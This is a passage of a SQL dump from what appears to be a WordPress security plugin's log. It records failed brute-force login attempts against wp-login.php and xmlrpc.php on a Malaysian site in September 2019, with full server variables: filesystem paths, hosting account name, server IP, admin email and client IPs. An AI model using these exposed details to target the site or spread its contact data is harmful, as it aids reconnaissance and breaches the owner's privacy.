15:23:15',18256176,19555928,'https://bintara.com.my/xmlrpc.php',1,0,'162.214.20.79'),(24175,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"41568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@rhh0uvyt9KRYoKL8oywAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568648070.154\";s:12:\"REQUEST_TIME\";s:10:\"1568648070\";}}','notice','2019-09-16 15:34:31','2019-09-16 15:34:30',17736816,19229184,'https://bintara.com.my/wp-login.php',1,0,'89.111.24.122'),(24176,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"41990\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@riB0uvyt9KRYoKL8ozAAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568648072.9248\";s:12:\"REQUEST_TIME\";s:10:\"1568648072\";}}','notice','2019-09-16 15:34:34','2019-09-16 15:34:33',18255928,19556144,'https://bintara.com.my/xmlrpc.php',1,0,'89.111.24.122'),(24177,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"38500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@uiB0uvyt9KRYoKL8q2gAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568648840.3007\";s:12:\"REQUEST_TIME\";s:10:\"1568648840\";}}','notice','2019-09-16 15:47:21','2019-09-16 15:47:20',17739512,19231720,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2'),(24178,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"38944\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@uih0uvyt9KRYoKL8q3AAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568648843.0643\";s:12:\"REQUEST_TIME\";s:10:\"1568648843\";}}','notice','2019-09-16 15:47:24','2019-09-16 15:47:23',18256032,19555520,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(24179,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"56372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@xRGCCaIOMm5l5jJFJqAAAAQQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568649540.1042\";s:12:\"REQUEST_TIME\";s:10:\"1568649540\";}}','notice','2019-09-16 15:59:01','2019-09-16 15:59:00',17739176,19230624,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24180,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"56640\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@xRh0uvyt9KRYoKL8sGAAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568649542.203\";s:12:\"REQUEST_TIME\";s:10:\"1568649542\";}}','notice','2019-09-16 15:59:03','2019-09-16 15:59:02',18256144,19555472,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(24181,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"50538\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@0Rx0uvyt9KRYoKL8uOwAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568650311.5148\";s:12:\"REQUEST_TIME\";s:10:\"1568650311\";}}','notice','2019-09-16 16:11:52','2019-09-16 16:11:51',17737904,19228648,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(24182,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"51008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@0SnPgbK7GuRh1kKnnSwAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568650314.2445\";s:12:\"REQUEST_TIME\";s:10:\"1568650314\";}}','notice','2019-09-16 16:11:55','2019-09-16 16:11:54',18254024,19552072,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(24183,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"37548\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@2-R0uvyt9KRYoKL8vsAAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568651006.0573\";s:12:\"REQUEST_TIME\";s:10:\"1568651006\";}}','notice','2019-09-16 16:23:27','2019-09-16 